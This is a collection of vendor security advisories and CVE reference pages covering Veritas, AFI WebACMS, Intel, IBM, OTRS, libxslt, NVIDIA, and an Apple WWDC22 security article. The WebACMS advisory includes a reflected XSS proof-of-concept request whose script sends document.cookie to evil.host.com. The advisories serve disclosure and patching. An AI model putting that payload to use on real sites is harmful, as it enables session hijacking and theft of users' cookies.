Veritas System Recovery (VSR) 18 and 21 stores a network destination password in the Windows registry during configuration of the backup configuration. This could allow a Windows user (who has sufficient privileges) to access a network file system that they were not authorized to access.

**Revision History**

*   1.0: September 7, 2021: Initial version

**Summary**

A Sensitive Information Disclosure Vulnerability has been found in Veritas System Recovery (VSR).

**Issue**

*   Sensitive Information Disclosure Vulnerability: Password Stored in Windows Registry
*   CVE ID: To be assigned
*   Severity: Medium
*   CVSS v3.1 Base Score 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Veritas System Recovery (VSR) versions 18 and 21 store a network destination password in the Windows registry during configuration of the backup configuration. This vulnerability could provide a Windows user who has sufficient privileges to access a network file system which they were not authorized to access.

**Remediation**

Customers under a current maintenance contract can download and install application binaries which mitigate this vulnerability, as described below:

*   If you are on VSR 18:

*   Ensure that your system has been updated to the latest service pack VSR 18 SP4, and
*   Download the updated VProSvc.exe ( Version: 18.0.4.57090 ) for your operating system
*   Replace the VProSvc.exe on your server and clients with the updated version

*   If you are on VSR 21:

*   Ensure that your system has been updated to the latest service pack VSR 21 SP3, and
*   Download the updated VProSvc.exe ( Version: 21.0.3.62140 ) for your operating system
*   Replace the VProSvc.exe on your server and clients with the updated version

See the Veritas Download Center for available updates: https://www.veritas.com/support/en\_US/downloads

**Questions**

For questions or problems regarding these vulnerabilities please contact Veritas Technical Support (https://www.veritas.com/support), or see the Article id: 100051263.

**Disclaimer**

THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE.

Veritas Technologies LLC  
2625 Augustine Drive  
Santa Clara, CA 95054

CVE-2022-26778: Sensitive Information Disclosure Vulnerability in Veritas System Recovery

Cross Site Scripting (XSS) vulnerability exists in index.html in AFI WebACMS through 2.1.0 via the the ID parameter.

**AFI Solutions WebACMS ist anfällig für Reflected Cross-Site Scripting, was auf fehlende Filterung bei der Benutzereingabe zurückzuführen ist. Diese Schwachstelle wird behandelt als CVE-2021-44829 und wurde entdeckt von Patrick Hener und Siva Rajendran.**

**Detailed Security Advisory**

*   Advisory ID: TO-2021-001
*   Product: WebACMS
*   Vendor: AFI Solutions GmbH
*   Tested Version: 2.1.0
*   Fixed Version: –
*   Vulnerability Type: Cross-Site Scripting (CWE-79)
*   CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:P/A:N (Score 6.4)
*   CVSSv3 Severity: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (Score 6.1)
*   Solution Status: Unfixed
*   Manufacturer Notification: 2021-12-13
*   Solution Date: 2022-01-17
*   Public Disclosure: 2022-01-20
*   CVE Reference: CVE-2021-44829
*   Authors of Advisory: Patrick Hener & Siva Rajendran, Thinking Objects GmbH

**Overview**

The product „ACMS“ of AFI Solutions GmbH \[1\] is a so called edi converter. For  
companies to be able to exchange arbitrary data it is common to use a edi  
converter to convert between data formats of the sender and the recipient.  
The product of AFI Solutions also incorporates a web interface, which is the  
subject of this advisory.

**Vulnerability Details**

The index page has a parameter „ID“ which is used to navigate within the web  
application. It is not properly sanitized and will be rendered into the login  
form of the index page, as well. The vulnerable code will be shown from the  
following listing:

<form action="/index.html?id=1" method="post" name="thisForm" target="\_top">

\[.. truncated ..\]

<table class="logintable">
<tbody>
<tr>
<td width="110">Benutzername</td>
</tr>
</tbody>
</table>
</form>

The parameter can be chosen from the actual url in the browser and thus is  
unsanitized user controlled input. This makes the application vulnerable to  
reflected Cross-Site Scripting. This vulnerability also applies to basically  
all user controlled input after login. Also content returned by the database  
is not properly sanitized before presentation, as well. Therefore the app is  
also vulnerable to stored Cross-Site Scripting.

**Proof of Concept (PoC)**

The following request will steal the applications insecure cookies using this  
vulnerablity.

GET /index.html?id=%22%3E%3Cscript%3Edocument.location=%27http://evil.host.com
/cookies?%27%2Bdocument.cookie;%3C/script%3E%3Cid=%22 HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,
image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: COMID=

Upgrade-Insecure-Requests: 1

This will render to the following html code and trigger in a victims browser.

<form action="/index.html?id=" method="post" name="thisForm"><script>
document.location='http://evil.host.com/cookies?'+document.cookie;</script>
<id="" target="\_top">

**Solution**

The user supplied data should be sanitized before using it to render a page.  
Also database retrieved content should be sanitized before presenting it to the  
browser again.

The vendor states that this software component was only used by the vendors  
support and that it is not used actively anymore. The vendor recommends to  
deactivate this component.

**Disclosure Timeline**

*   2021-12-10: Vulnerability discovered
*   2021-12-13: Vulnerability reported to manufacturer
*   2022-01-17: Solution provided by manufacturer
*   2022-01-20: Public disclosure of vulnerability

**References**

\[1\] Vendor Website:  
https://www.afi-solutions.com/  
\[2\] Thinking Objects Security Advisory  
https://blog.to.com/advisory-webacms-2-1-0-cross-site-scripting  
\[3\] Thinking Objects Responsible Disclosure Policy  
https://blog.to.com/responsible-disclosure-policy/

**Credits**

This security vulnerability was found by Patrick Hener and Siva Rajendran  
of Thinking Objects GmbH.

E-Mail: patrick.hener@to.com  
Public Keys: https://to.com/pgp-keys  
Key ID: 877756EA2CB50685  
Key Fingerprint: 2605 3D51 3FAA 3795 E116 95EC 8777 56EA 2CB5 0685

**Disclaimer**

The information provided in this security advisory is provided „as is“  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible.

**Copyright**

Creative Commons – Attribution (by) – Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

CVE-2021-44829: Advisory: WebACMS 2.1.0 Cross-Site Scripting

Improper conditions check in the Open CAS software maintained by Intel(R) before version 22.3.1 may allow an authenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Open CAS Advisory**

**Summary: **

A potential security vulnerability in the Open Cache Acceleration Software (CAS) maintained by Intel may allow denial of service.  Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-29523

Description: Improper conditions check in the Open CAS software maintained by Intel(R) before version 22.3.1 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 3.3 Low

**Affected Products:**

Open CAS software maintained by Intel before version 22.3.1.  
 

**Recommendations:**

Intel recommends updating the Open CAS software maintained by Intel to version 22.3.1 or later.

Updates are available for download at this location:

https://github.com/Open-CAS/ocf/releases  
 

**Acknowledgements:**

Intel would like to thank Jan Musial for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-29523: INTEL-SA-00736

IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 may be vulnerable to an information disclosure caused by improper privilege management when table function is used. IBM X-Force ID: 221973.

  

**Summary**

IBM® Db2® is vulnerable to an information disclosure caused by improper privilege management when table function is used.

**Vulnerability Details**

**CVEID:**   CVE-2022-22390  
**DESCRIPTION:**   IBM Db2 may be vulnerable to an information disclousre caused by improper privilege management when table function is used.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/221973 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

All fix pack levels of IBM Db2 V9.7, V10.1, V10.5, V11.1, and V11.5 server editions on all platforms are affected. 

  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program, V9.7, V10.1, V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release: V9.7 FP11, V10.1 FP6, V10.5 FP11, V11.1.4 FP7, and V11.5.7. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V9.7

TBD

IT40220

Special Build for V9.7 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  (Link will be updated as soon as it is available)  
Windows 64-bit, x86  (Link will be updated as soon as it is available)

V10.1

TBD

IT40219

Special Build for V10.1 FP6:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86  
Windows 64-bit, x86

V10.5

TBD

IT40218

Special Build for V10.5 FP11:

AIX 64-bit  
HP-UX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ big endian  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Solaris 64-bit, x86-64  
Windows 32-bit, x86   
Windows 64-bit, x86  
Inspur

V11.1

TBD

IT40186

Special Build for V11.1.4 FP7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Solaris 64-bit, SPARC  
Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

IT40217

Special Build for V11.5.7:

AIX 64-bit  
Linux 32-bit, x86-32  
Linux 64-bit, x86-64  
Linux 64-bit, POWER™ little endian  
Linux 64-bit, System z®, System z9® or zSeries®  
Windows 32-bit, x86  
Windows 64-bit, x86

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by dijing wang at BEIJING DBSEC TECHNOLOGY CO., LTD.

**Change History**

23 Jun 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"DB2 for Linux- UNIX and Windows"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF027","label":"Solaris"},{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"9.7,10.1,10.5,11.1,11.5","Edition":"Advanced Enterprise Server, et al","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2022-22390: IBM® Db2® is vulnerable to an information disclosure caused by improper privilege management when table function is used. (CVE-2022-22390)

IBM Aspera Faspex 4.4.2 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote authenticated attacker could exploit this vulnerability to execute arbitrary commands. IBM X-Force ID: 249845.

  

**Summary**

This Security Bulletin addresses security vulnerabilities that have been remediated (CVE-2023-27871, CVE-2023-27873) and mitigated (CVE-2023-27874) in IBM Aspera Faspex 4.4.2 PL3.

**Vulnerability Details**

**CVEID:**   CVE-2023-27874  
**DESCRIPTION:**   IBM Aspera is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote authenticated attacker could exploit this vulnerability to execute arbitrary commands.  
CVSS Base score: 9.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/249845 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

**CVEID:**   CVE-2023-27871  
**DESCRIPTION:**   IBM Aspera Faspex could allow a remote attacker to obtain sensitive credential information for an external user, using a specially crafted SQL query.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/249613 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-27873  
**DESCRIPTION:**   IBM Aspera Faspex could allow a remote authenticated attacker to obtain sensitive credential information using specially crafted XML input.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/249654 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

IBM Aspera Faspex 4.4.2 PL2 and earlier versions.

**Remediation/Fixes**

**It is recommended that customers take one of the following actions as soon as possible:**

1.  **Upgrade to Faspex v5.**  Given the impending end of service of Version 4 later this year, this is an important action all customers should take.

Faspex 5.0.4 can be downloaded from here.    Installation instructions can be found here.

2.  Apply the latest version 4 patch - 4.4.2 PL3, see links below.

**Product(s)**

**Fixing VRM**

**Platform**

**Link to Fix**

IBM Aspera Faspex

4.4.2 PL3

Windows

click here

IBM Aspera Faspex

4.4.2 PL3

Linux

click here

**Workarounds and Mitigations**

This fix mitigates CVE-2023-27874.

**References**

Off

**Acknowledgement**

**Change History**

20 Mar 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSRFYR","label":"IBM Aspera on Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSQQRP","label":"IBM Aspera SDK"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSGPEF","label":"IBM Aspera Faspex"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"4.4.2 PL2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSQ65JJ","label":"IBM Aspera Enterprise"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS8NDZ","label":"IBM Aspera"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSXMXJ","label":"IBM Aspera Faspex On Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"}\],"Version":"4.4.2 PL2","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSHI916","label":"IBM Aspera Enterprise On Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-27874: Security Bulletin: IBM Aspera Faspex 4.4.2 PL3 has addressed multiple vulnerabilities (CVE-2023-27871, CVE-2023-27873, CVE-2023-27874)

An improper privilege check in the OTRS ticket move action in the agent interface allows   any as agent authenticated attacker to  to perform a move of an ticket without the needed permission.
This issue affects OTRS: from 8.0.X before 8.0.35.



**Release Note**

**Please read carefully and check if the version of your OTRS system is affected by this vulnerability.**

**Please send information regarding vulnerabilities in OTRS to: security@otrs.org**

**PGP Key**

*   pub 2048R/9C227C6B 2011-03-21
*   uid OTRS Security Team <security@otrs.org\>
*   GPG Fingerprint E330 4608 DA6E 34B7 1551 C244 7F9E 44E9 9C22 7C6B

**Security Advisory Details**

*   ID: OSA-2023-07
*   Date: 2023-07-24
*   Title: Tickets can be moved without permission
*   Severity: 4.1 MEDIUM
*   Product: OTRS 8.0.x
*   Fixed in: OTRS 8.0.35
*   CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N
*   References: CVE-2023-38058

**OSA-2023-07 Tickets can be moved without permission (CVE-2023-38058)**

An improper privilege check in the OTRS ticket move action in the agent interface allows any as agent authenticated attacker to to perform a move of an ticket without the needed permission.

**PRODUCT AFFECTED:**

This issue affects

OTRS: from 8.0.X before 8.0.35

**PROBLEM:**

CWE-269 Improper Privilege Management CWE-269

**Impact:**

CAPEC-233 Privilege Escalation CAPEC-233

**Product Status**

OTRS AG **OTRS** » Agent interface

Default status is affected

from 8.0.x before 8.0.35

**SOLUTION:**

Update to OTRS 8.0.35

**MODIFICATION HISTORY:**

*   —

**CVSS SCORE:**

*   CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

**RISK LEVEL:**

MEDIUM

**ACKNOWLEDGEMENTS:**

CVE-2023-38058: OTRS Security Advisory 2023-07 | OTRS

The xsltAddTextString function in transform.c in libxslt 1.1.29, as used in Blink in Google Chrome prior to 57.0.2987.98 for Mac, Windows, and Linux and 57.0.2987.108 for Android, lacked a check for integer overflow during a size calculation, which allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page.

**Commit 08ab2774** authored Jan 12, 2017 by ![Nick Wellnhofer's avatar](https://secure.gravatar.com/avatar/bfdcb4596e9da98cccbf9a0069fdff6c?s=48&d=identicon "Nick Wellnhofer")

Browse files

**Check for integer overflow in xsltAddTextString**

Limit buffer size in xsltAddTextString to INT\_MAX. The issue can be
exploited to trigger an out of bounds write on 64-bit systems.

Originally reported to Chromium:

https://crbug.com/676623

*   Changes 2

...

...

@@ -813,13 +813,32 @@ xsltAddTextString(xsltTransformContextPtr ctxt, xmlNodePtr target,

return(target);

if (ctxt\->lasttext \== target\->content) {

int minSize;

if (ctxt\->lasttuse + len \>= ctxt\->lasttsize) {

/\* Check for integer overflow accounting for NUL terminator. \*/

if (len \>= INT\_MAX \- ctxt\->lasttuse) {

xsltTransformError(ctxt, NULL, target,

"xsltCopyText: text allocation failed\\n");

return(NULL);

}

minSize \= ctxt\->lasttuse + len + 1;

if (ctxt\->lasttsize < minSize) {

xmlChar \*newbuf;

int size;

int extra;

/\* Double buffer size but increase by at least 100 bytes. \*/

extra \= minSize < 100 ? 100 : minSize;

/\* Check for integer overflow. \*/

if (extra \> INT\_MAX \- ctxt\->lasttsize) {

size \= INT\_MAX;

}

else {

size \= ctxt\->lasttsize + extra;

}

size \= ctxt\->lasttsize + len + 100;

size \*= 2;

newbuf \= (xmlChar \*) xmlRealloc(target\->content,size);

if (newbuf \== NULL) {

xsltTransformError(ctxt, NULL, target,

...

...

...

...

@@ -1754,8 +1754,8 @@ struct \_xsltTransformContext {

\* Speed optimization when coalescing text nodes

\*/

const xmlChar \*lasttext; /\* last text node content \*/

unsigned int lasttsize; /\* last text node size \*/

unsigned int lasttuse; /\* last text node use \*/

int lasttsize; /\* last text node size \*/

int lasttuse; /\* last text node use \*/

/\*

\* Per Context Debugging

\*/

...

...

CVE-2017-5029: Check for integer overflow in xsltAddTextString (08ab2774) · Commits · GNOME / libxslt

Passkeys, Safety Check, and Private Access Tokens demonstrated during week-long virtual conference

Passkeys, Safety Check, and Private Access Tokens demonstrated during week-long virtual conference

The 2022 edition of Apple’s Worldwide Developers Conference (WWDC) kicked off this week, with numerous security and privacy developments placed front and center among the firm’s mobile and desktop platforms.

As has become tradition, this year’s WWDC offered a glimpse into Apple’s product and feature pipeline for the coming months.

On Monday (June 6), attendees were given a first look at the redesigned MacBook Air and the updated 13-inch MacBook Pro powered by the M2 chip, along with new features coming to iOS 16, iPadOS 16, macOS Ventura, and watchOS 9.

**What’s new in Safari?**

Apple’s Safari browser – which is now thought to have overtaken Chrome as the most popular mobile browser in North America – will soon include several security and privacy enhancements designed to help protect users and open up new opportunities for developers.

“With both of the new Cross Origin Opener Policy and Cross Origin Embedder Policy HTTP response headers, your site can opt in to process isolation, which means your site will run in its own dedicated webContent process,” said Kendall Bagley, software engineer on the Safari team.

**DON’T MISS** HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

“Our second security enhancement also involves HTTP headers, with our improved support for Content Security Policy Level 3. CSP provides enhanced security control over your loading content and mitigates risk of cross-site scripting \[XSS\] and other vulnerabilities.”

Check out the Safari 16 beta release notes for more information.

WWDC22 attendees watch the unveiling of iOS 16

**Introducing Passkeys**

Garrett Davidson of Apple’s authentication experience team took to the virtual stage at WWDC22 to showcase Passkeys, the company’s “next-generation authentication technology”.

“Passwords are really hard to use securely,” Davidson explained. “All of us know we’re supposed to create strong, unique passwords for every account, but not many people actually do.”

He added: “As you’re designing your apps and websites, there’s this constant trade-off between keeping accounts secure and designing a good experience. And even if your apps and websites do everything right, issues like phishing and password reuse can still lead to account compromise.”

Read more of the latest Apple security news

To tackle this, Passkeys – which will come bundled with the upcoming macOS Ventura and iOS 16 – creates a unique, cryptographically strong key pair for user accounts and stores it in iCloud Keychain so it syncs and works across all devices.

Once the pairing has been created, any future visit to the app or website sign-in form will show the ‘Passkey’ option in the QuickType bar. The user simply needs to tap the option, or use Touch ID, and they are signed in.

Davidson said: “With Passkeys, not only is the user experience better than a password, but also entire categories of security problems, like weak and reused credentials, credential leaks, and phishing, are just not possible anymore. And they are so easy to use.”

Visit Apple’s technical documentation page for implementation information.

**Safety Check**

Also new for Apple devices this year is a new privacy tool called Safety Check, which aims to help users whose personal safety might be at risk from domestic or intimate partner violence.

Designed to allow users to quickly remove all device access that may have granted to others, Safety Check includes an emergency reset that helps users easily sign out of iCloud on all their other devices, reset privacy permissions, and limit messaging to just the device in their hand.

The service also helps users understand and manage which people and apps they’ve given access to.

**Replacing CAPTCHAs**

That’s not all from WWDC22, as two additional privacy and security tools are due to be showcased later this week.

On Wednesday (June 8), the Apple team will demonstrate Private Access Tokens. This new technology is being marketed as a “powerful alternative” to CAPTCHA challenges that help the identification of HTTP requests from legitimate devices without compromising users’ identity.

“We’ll show you how your app and server can take advantage of this tool to add confidence to your online transactions and preserve privacy,” Apple said.

**YOU MIGHT ALSO LIKE** Popular websites leaking user email data to web tracking domains

Lastly, June 10 will see Apple showcase the latest ways to ensure that DNS – the foundation of internet addressing – is secure within an application.

“Learn how to authenticate DNS responses in your app with DNSSEC and enable DNS encryption automatically with Discovery of Designated Resolvers (DDR),” Apple said in its presentation teaser this week.

WWDC22 continues through June 10. Check out the complete list of sessions for further information.

**READ MORE** Google showers top cloud security researchers with kudos and cash

WWDC 2022: Apple showcases next-gen security tech at annual developer event

NVIDIA Omniverse Launcher contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can get user to browse malicious site, to acquire access tokens allowing them to access resources in other security domains, which may lead to code execution, escalation of privileges, and impact to confidentiality and integrity.

**Details**

This section provides a summary of potential vulnerabilities that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2022‑21817

NVIDIA Omniverse Launcher contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can get user to browse malicious site, to acquire access tokens allowing them to access resources in other security domains, which may lead to code execution, escalation of privileges, and impact to confidentiality and integrity.

9.3

AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends evaluating the risk to your specific configuration.

**Security Update**

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update.

To protect your system, open the Omniverse Launcher client which will automatically apply the security update. Alternatively, you can download and install this software update from the Omniverse Downloads page.

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

CVE‑2022‑21817

NVIDIA Omniverse Launcher

Windows and Linux

All versions prior to 1.5.2

1.5.2

**Notes**

*   Earlier software releases that support this product are also affected. If you are using an earlier release, upgrade to the latest branch release.

**Mitigations**

None. See Security Update for the version to install.

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins 
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT) 

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

January 31, 2022

Initial release

**Support**

